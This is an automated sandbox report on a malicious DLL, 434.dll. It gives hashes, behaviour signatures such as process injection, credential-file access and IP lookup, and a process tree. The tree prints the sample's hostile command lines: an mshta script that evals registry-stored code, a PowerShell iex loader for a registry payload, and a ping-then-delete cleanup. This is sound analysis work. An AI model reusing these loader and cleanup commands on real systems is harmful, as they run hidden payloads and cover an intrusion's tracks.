Analysis
-
max time kernel
150s -
max time network
136s -
platform
windows10_x64 -
resource
win10 -
submitted
13-07-2020 16:55
Static task
static1
Behavioral task
behavioral1
Sample
434.dll
Resource
win7
General
-
Target
434.dll
-
Size
367KB
-
MD5
7e9c8822be0f73073ce2cc5ef5a13c96
-
SHA1
10b2f8667db53eaf1b85a209d9b80b834425167f
-
SHA256
bd6840cc208517847e130db0c847e715ba80a88e210e6383b37c1d0381877ee5
-
SHA512
120bfec74eed70dc19d7aff9ed8dc392616a6c652f4c7b3f642219c6d5203038e66cef65e67b79041b8653b65021e2402b3cfc0f3b6850afd1d13e2a03637118
Malware Config
Signatures
-
Checks whether UAC is enabled 3 IoCs
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE -
Suspicious use of SetThreadContext 8 IoCs
Processes:
rundll32.exesvchost.exepowershell.exeExplorer.EXEcmd.exedescription pid process target process PID 3840 set thread context of 3828 3840 rundll32.exe svchost.exe PID 3828 set thread context of 68 3828 svchost.exe svchost.exe PID 3408 set thread context of 2968 3408 powershell.exe Explorer.EXE PID 2968 set thread context of 3340 2968 Explorer.EXE RuntimeBroker.exe PID 2968 set thread context of 3720 2968 Explorer.EXE cmd.exe PID 2968 set thread context of 3768 2968 Explorer.EXE iexplore.exe PID 3720 set thread context of 2560 3720 cmd.exe PING.EXE PID 2968 set thread context of 3920 2968 Explorer.EXE WinMail.exe -
Executes dropped EXE 1 IoCs
Processes:
BN28C0.tmppid process 3324 BN28C0.tmp -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
iexplore.exepid process 3768 iexplore.exe 3768 iexplore.exe 3768 iexplore.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 3 api.ipify.org -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Suspicious behavior: EnumeratesProcesses 2022 IoCs
Processes:
svchost.exeWerFault.exepowershell.exeExplorer.EXEpid process 3828 svchost.exe 3828 svchost.exe 3828 svchost.exe 3828 svchost.exe 2224 WerFault.exe 2224 WerFault.exe 2224 WerFault.exe 2224 WerFault.exe 2224 WerFault.exe 2224 WerFault.exe 2224 WerFault.exe 2224 WerFault.exe 2224 WerFault.exe 2224 WerFault.exe 2224 WerFault.exe 2224 WerFault.exe 2224 WerFault.exe 2224 WerFault.exe 3408 powershell.exe 3408 powershell.exe 3408 powershell.exe 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 96 IoCs
Processes:
svchost.exesvchost.exedescription pid process Token: SeImpersonatePrivilege 3828 svchost.exe Token: SeTcbPrivilege 3828 svchost.exe Token: SeChangeNotifyPrivilege 3828 svchost.exe Token: SeCreateTokenPrivilege 3828 svchost.exe Token: SeBackupPrivilege 3828 svchost.exe Token: SeRestorePrivilege 3828 svchost.exe Token: SeIncreaseQuotaPrivilege 3828 svchost.exe Token: SeAssignPrimaryTokenPrivilege 3828 svchost.exe Token: SeImpersonatePrivilege 3828 svchost.exe Token: SeTcbPrivilege 3828 svchost.exe Token: SeChangeNotifyPrivilege 3828 svchost.exe Token: SeCreateTokenPrivilege 3828 svchost.exe Token: SeBackupPrivilege 3828 svchost.exe Token: SeRestorePrivilege 3828 svchost.exe Token: SeIncreaseQuotaPrivilege 3828 svchost.exe Token: SeAssignPrimaryTokenPrivilege 3828 svchost.exe Token: SeImpersonatePrivilege 3828 svchost.exe Token: SeTcbPrivilege 3828 svchost.exe Token: SeChangeNotifyPrivilege 3828 svchost.exe Token: SeCreateTokenPrivilege 3828 svchost.exe Token: SeBackupPrivilege 3828 svchost.exe Token: SeRestorePrivilege 3828 svchost.exe Token: SeIncreaseQuotaPrivilege 3828 svchost.exe Token: SeAssignPrimaryTokenPrivilege 3828 svchost.exe Token: SeImpersonatePrivilege 3828 svchost.exe Token: SeTcbPrivilege 3828 svchost.exe Token: SeChangeNotifyPrivilege 3828 svchost.exe Token: SeCreateTokenPrivilege 3828 svchost.exe Token: SeBackupPrivilege 3828 svchost.exe Token: SeRestorePrivilege 3828 svchost.exe Token: SeIncreaseQuotaPrivilege 3828 svchost.exe Token: SeAssignPrimaryTokenPrivilege 3828 svchost.exe Token: SeImpersonatePrivilege 3828 svchost.exe Token: SeTcbPrivilege 3828 svchost.exe Token: SeChangeNotifyPrivilege 3828 svchost.exe Token: SeCreateTokenPrivilege 3828 svchost.exe Token: SeBackupPrivilege 3828 svchost.exe Token: SeRestorePrivilege 3828 svchost.exe Token: SeIncreaseQuotaPrivilege 3828 svchost.exe Token: SeAssignPrimaryTokenPrivilege 3828 svchost.exe Token: SeImpersonatePrivilege 68 svchost.exe Token: SeTcbPrivilege 68 svchost.exe Token: SeChangeNotifyPrivilege 68 svchost.exe Token: SeCreateTokenPrivilege 68 svchost.exe Token: SeBackupPrivilege 68 svchost.exe Token: SeRestorePrivilege 68 svchost.exe Token: SeIncreaseQuotaPrivilege 68 svchost.exe Token: SeAssignPrimaryTokenPrivilege 68 svchost.exe Token: SeImpersonatePrivilege 68 svchost.exe Token: SeTcbPrivilege 68 svchost.exe Token: SeChangeNotifyPrivilege 68 svchost.exe Token: SeCreateTokenPrivilege 68 svchost.exe Token: SeBackupPrivilege 68 svchost.exe Token: SeRestorePrivilege 68 svchost.exe Token: SeIncreaseQuotaPrivilege 68 svchost.exe Token: SeAssignPrimaryTokenPrivilege 68 svchost.exe Token: SeImpersonatePrivilege 68 svchost.exe Token: SeTcbPrivilege 68 svchost.exe Token: SeChangeNotifyPrivilege 68 svchost.exe Token: SeCreateTokenPrivilege 68 svchost.exe Token: SeBackupPrivilege 68 svchost.exe Token: SeRestorePrivilege 68 svchost.exe Token: SeIncreaseQuotaPrivilege 68 svchost.exe Token: SeAssignPrimaryTokenPrivilege 68 svchost.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2224 3840 WerFault.exe rundll32.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 3408 powershell.exe 2968 Explorer.EXE 2968 Explorer.EXE 2968 Explorer.EXE 3720 cmd.exe 2968 Explorer.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEpid process 3768 iexplore.exe 3768 iexplore.exe 664 IEXPLORE.EXE 664 IEXPLORE.EXE 3768 iexplore.exe 3768 iexplore.exe 1312 IEXPLORE.EXE 1312 IEXPLORE.EXE 3768 iexplore.exe 3768 iexplore.exe 664 IEXPLORE.EXE 664 IEXPLORE.EXE -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious use of WriteProcessMemory 74 IoCs
Processes:
rundll32.exerundll32.exesvchost.exeiexplore.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.execmd.exedescription pid process target process PID 3820 wrote to memory of 3840 3820 rundll32.exe rundll32.exe PID 3820 wrote to memory of 3840 3820 rundll32.exe rundll32.exe PID 3820 wrote to memory of 3840 3820 rundll32.exe rundll32.exe PID 3840 wrote to memory of 3828 3840 rundll32.exe svchost.exe PID 3840 wrote to memory of 3828 3840 rundll32.exe svchost.exe PID 3840 wrote to memory of 3828 3840 rundll32.exe svchost.exe PID 3840 wrote to memory of 3828 3840 rundll32.exe svchost.exe PID 3840 wrote to memory of 3828 3840 rundll32.exe svchost.exe PID 3828 wrote to memory of 1880 3828 svchost.exe cmd.exe PID 3828 wrote to memory of 1880 3828 svchost.exe cmd.exe PID 3828 wrote to memory of 1880 3828 svchost.exe cmd.exe PID 3828 wrote to memory of 68 3828 svchost.exe svchost.exe PID 3828 wrote to memory of 68 3828 svchost.exe svchost.exe PID 3828 wrote to memory of 68 3828 svchost.exe svchost.exe PID 3828 wrote to memory of 68 3828 svchost.exe svchost.exe PID 3828 wrote to memory of 68 3828 svchost.exe svchost.exe PID 3828 wrote to memory of 3324 3828 svchost.exe BN28C0.tmp PID 3828 wrote to memory of 3324 3828 svchost.exe BN28C0.tmp PID 3828 wrote to memory of 3324 3828 svchost.exe BN28C0.tmp PID 3768 wrote to memory of 664 3768 iexplore.exe IEXPLORE.EXE PID 3768 wrote to memory of 664 3768 iexplore.exe IEXPLORE.EXE PID 3768 wrote to memory of 664 3768 iexplore.exe IEXPLORE.EXE PID 3768 wrote to memory of 1312 3768 iexplore.exe IEXPLORE.EXE PID 3768 wrote to memory of 1312 3768 iexplore.exe IEXPLORE.EXE PID 3768 wrote to memory of 1312 3768 iexplore.exe IEXPLORE.EXE PID 2420 wrote to memory of 3408 2420 mshta.exe powershell.exe PID 2420 wrote to memory of 3408 2420 mshta.exe powershell.exe PID 3408 wrote to memory of 680 3408 powershell.exe csc.exe PID 3408 wrote to memory of 680 3408 powershell.exe csc.exe PID 680 wrote to memory of 3104 680 csc.exe cvtres.exe PID 680 wrote to memory of 3104 680 csc.exe cvtres.exe PID 3408 wrote to memory of 3524 3408 powershell.exe csc.exe PID 3408 wrote to memory of 3524 3408 powershell.exe csc.exe PID 3524 wrote to memory of 3892 3524 csc.exe cvtres.exe PID 3524 wrote to memory of 3892 3524 csc.exe cvtres.exe PID 3408 wrote to memory of 2968 3408 powershell.exe Explorer.EXE PID 3408 wrote to memory of 2968 3408 powershell.exe Explorer.EXE PID 3408 wrote to memory of 2968 3408 powershell.exe Explorer.EXE PID 3408 wrote to memory of 2968 3408 powershell.exe Explorer.EXE PID 2968 wrote to memory of 3340 2968 Explorer.EXE RuntimeBroker.exe PID 2968 wrote to memory of 3340 2968 Explorer.EXE RuntimeBroker.exe PID 2968 wrote to memory of 3720 2968 Explorer.EXE cmd.exe PID 2968 wrote to memory of 3720 2968 Explorer.EXE cmd.exe PID 2968 wrote to memory of 3720 2968 Explorer.EXE cmd.exe PID 2968 wrote to memory of 3340 2968 Explorer.EXE RuntimeBroker.exe PID 2968 wrote to memory of 3340 2968 Explorer.EXE RuntimeBroker.exe PID 2968 wrote to memory of 3768 2968 Explorer.EXE iexplore.exe PID 2968 wrote to memory of 3768 2968 Explorer.EXE iexplore.exe PID 2968 wrote to memory of 3720 2968 Explorer.EXE cmd.exe PID 2968 wrote to memory of 3720 2968 Explorer.EXE cmd.exe PID 2968 wrote to memory of 3768 2968 Explorer.EXE iexplore.exe PID 2968 wrote to memory of 3768 2968 Explorer.EXE iexplore.exe PID 3720 wrote to memory of 2560 3720 cmd.exe PING.EXE PID 3720 wrote to memory of 2560 3720 cmd.exe PING.EXE PID 3720 wrote to memory of 2560 3720 cmd.exe PING.EXE PID 3720 wrote to memory of 2560 3720 cmd.exe PING.EXE PID 3720 wrote to memory of 2560 3720 cmd.exe PING.EXE PID 2968 wrote to memory of 3356 2968 Explorer.EXE cmd.exe PID 2968 wrote to memory of 3356 2968 Explorer.EXE cmd.exe PID 2968 wrote to memory of 3152 2968 Explorer.EXE cmd.exe PID 2968 wrote to memory of 3152 2968 Explorer.EXE cmd.exe PID 3152 wrote to memory of 2680 3152 cmd.exe nslookup.exe PID 3152 wrote to memory of 2680 3152 cmd.exe nslookup.exe PID 3356 wrote to memory of 2672 3356 cmd.exe nslookup.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 2560 PING.EXE -
Checks for installed software on the system 1 TTPs 7 IoCs
Processes:
svchost.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName svchost.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe Key enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName svchost.exe -
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30824758" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 1067ca6f3659d601 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f72535b3d71787499ad6028e231c2f4e0000000002000000000010660000000100002000000065a255119024c8380d93152127e98218d153f640585d067ae3b58af5a9a819ff000000000e800000000200002000000029a987004d53ee3e4c9de9e6db63f4faeeaa23711a5be0dfcbc6f21032212ffe20000000edfca8e2f42ad18da84370ecbf99388b59e54ea1ed646ad28172a019e65a239d400000007808805c3efaa579e9d7c30435889728a14441853aa3ec9e47cd68b024ee87bc82c3b55ce78a1a119533eed0c7b3f32e871980c6c6e2c2c3461d4953b45b6555 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2101946939" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f72535b3d71787499ad6028e231c2f4e000000000200000000001066000000010000200000007d854a7688e39114a017a84291a556325718ce1e8b6cf1a314bb705dc580bd2e000000000e8000000002000020000000845ce2e67ce314326af6ee4a79a5c6f5e948a9b509691ff2ae2de3c4580d90a920000000ed4eb733f9847370ecd4e1701f70e1b63f14503485965a241b0d1367dd80dc3d4000000064ca3fb283c86380ae2cd1527b49712dd2ddc6d0afa34776397306f88499f5df90bb49803e81f61a64ac7378eb6d401bdf357c5cf418db03aba2df40d42d4375 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2101946939" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30824758" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2104290971" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c0a4ba6e3659d601 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30824758" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A8F050D2-C529-11EA-95F0-D278D89B3D2A} = "0" iexplore.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\434.dll,#12⤵
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\434.dll,#13⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3840 -
C:\Windows\SysWOW64\svchost.exeC:\Windows\System32\svchost.exe4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- Checks for installed software on the system
PID:3828 -
C:\Windows\SysWOW64\cmd.execmd /K5⤵PID:1880
-
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\System32\svchost.exe5⤵
- Suspicious use of AdjustPrivilegeToken
PID:68
-
-
C:\Users\Admin\AppData\Local\Temp\BN28C0.tmpC:\Users\Admin\AppData\Local\Temp\BN28C0.tmp5⤵
- Executes dropped EXE
PID:3324
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 6524⤵
- Suspicious behavior: EnumeratesProcesses
- Program crash
PID:2224
-
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2FFAFA40-C261-3936-44D3-167DB8B7AA01\\\Addrient'));if(!window.flag)close()</script>"2⤵
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\2FFAFA40-C261-3936-44D3-167DB8B7AA01").appiness))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3408 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oiuycdv3\oiuycdv3.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D85.tmp" "c:\Users\Admin\AppData\Local\Temp\oiuycdv3\CSCB2B2CDD8A70745D7AD6E96D93E36FBE4.TMP"5⤵PID:3104
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c5zmxomj\c5zmxomj.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:3524 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8EED.tmp" "c:\Users\Admin\AppData\Local\Temp\c5zmxomj\CSCE09D1983B3B1431FA063C5AEC854C5.TMP"5⤵PID:3892
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\BN28C0.tmp"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3720 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2560
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\80A.bi1"2⤵
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:2680
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\8AA.bi1"2⤵
- Suspicious use of WriteProcessMemory
PID:3356 -
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:2672
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8AA.bi1"2⤵PID:2472
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\80A.bi1"2⤵PID:2444
-
-
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE2⤵PID:3920
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3340
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Checks whether UAC is enabled
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Modifies Internet Explorer settings
PID:3768 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3768 CREDAT:82945 /prefetch:22⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
- Modifies Internet Explorer settings
PID:664
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3768 CREDAT:82953 /prefetch:22⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
- Modifies Internet Explorer settings
PID:1312
-